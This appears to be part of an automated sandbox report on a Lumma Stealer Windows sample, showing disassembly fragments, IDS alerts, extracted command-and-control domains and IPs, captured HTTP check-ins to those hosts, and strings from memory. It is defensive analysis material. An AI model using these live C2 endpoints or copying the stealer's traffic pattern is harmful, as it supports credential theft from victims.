                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0076B75E
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_00760817
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_00754806
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0076C8B1
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00773897
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00749967
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00749967
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00749967
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0076C94B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov eax, edx0_2_0075C921
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00756907
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_0077A9DE
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_007689C0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0076C99C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0076C98D
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0074DA09
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0074DA09
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0074EAA2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0074CB7E
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00765BF7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ecx, di0_2_00765BF7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0074ABA7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov edx, ecx0_2_0074ABA7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_00776C3B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00769C17
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0075EC17
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_0077BC08
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov esi, eax0_2_00763C9B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_0077AD19
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_0077CD87
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00776E67
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov ecx, eax0_2_00761F77
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00755F79
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_00758F35
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00758F35
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_0077CFC7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0074DF8C

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.7:62819 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.7:65442 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.7:61238 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.7:49699 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.7:49699
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.7:57394 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.7:54253 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.7:59706 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.7:58349 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.7:62004 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.7:49700 -> 104.131.68.180:443
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.7:49700
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.7:57506 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.131.68.180:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49701 -> 104.121.10.34:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.131.68.180:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 45.77.249.79:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: Joe Sandbox ViewIP Address: 45.77.249.79 45.77.249.79
                  Source: Joe Sandbox ViewIP Address: 104.131.68.180 104.131.68.180
                  Source: Joe Sandbox ViewIP Address: 104.121.10.34 104.121.10.34
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.121.10.34:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.131.68.180:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered. equals www.youtube.com (Youtube)
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=825c38163a92c456e2df3c52; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 07:14:16 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=825c38163a92c456e2df3c52; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 07:14:16 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered. equals www.youtube.com (Youtube)
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampoweret
                  Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725212264.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apiUZ
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fas
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
